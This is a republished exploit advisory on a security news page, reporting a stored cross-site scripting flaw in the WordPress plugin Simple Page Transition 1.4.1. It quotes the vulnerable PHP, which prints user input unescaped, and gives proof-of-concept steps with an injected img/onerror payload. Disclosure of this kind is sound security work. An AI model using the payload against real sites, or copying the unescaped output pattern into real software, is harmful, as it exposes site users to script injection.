Home Tools Exploits & CVE's WordPress Simple Page Transition 1.4.1 Cross Site Scripting

WordPress Simple Page Transition 1.4.1 Cross Site Scripting

June 30, 2022

448

WordPress Simple Page Transition plugin version 1.4.1 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: WordPress Plugin ‘Simple Page Transition’  - Stored Cross
Site Scripting
# Date: 27-06-2022
# Exploit Author: Mariam Tariq - HunterSherlock
# Vendor Homepage: https://wordpress.org/plugins/simple-page-transition/
# Version: 1.4.1
# Tested on: Firefox
# Contact me: [email protected]


*#Vulnerable code*:

```
<label for="simple_page_transition_ignored"><?php _e( 'Ignored Download
Links', 'spt' ); ?></label><br />
<input type="text" id="simple_page_transition_ignored"
name="simple_page_transition_ignored" value="*<?php print
$simple_page_transition_ignored; ?>*" /><br />

```
*#POC:*

1- Install the plugin ‘simple page transition’ & activate it.
2- Navigate towards the “ignored download links”
3- Enter the XSS payload ` *“><img src=x onerror=alert(1)>*`

*#POC image:*

https://imgur.com/yzaTkhi

WordPress Simple Page Transition 1.4.1 Cross Site Scripting

Follow us on Instagram @thecyberpost

EDITOR PICKS

LRMS PHP 1.0 SQL Injection / Shell Upload

Palo Alto PAN-OS Command Execution / Arbitrary File Creation

Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

Nextar C472 POS DLL Hijacking

Splunk edit_user Capability Privilege Escalation

Shenzhen Skyworth RN510 Information Disclosure